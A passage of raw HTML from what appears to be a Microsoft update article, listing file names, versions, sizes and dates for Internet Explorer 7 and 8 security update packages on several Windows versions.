class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">295,936</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,051,648</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:37</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wadvpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wextmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wicardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">643,312</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">3,628,032</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">480,768</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsrating.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwebcheck.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">20:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 8</h3><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.13.0</td><td class=\"sbody-td\">231,288</td><td class=\"sbody-td\">04-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">10:54</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">25-Feb-2014</td><td class=\"sbody-td\">00:24</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">6,022,144</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,216,000</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Xpshims.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">11:46</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">221,488</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23569</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23569</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">08:29</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">08:29</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23569</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">22:50</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">24-Feb-2014</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23569</td><td class=\"sbody-td\">630,272</td><td 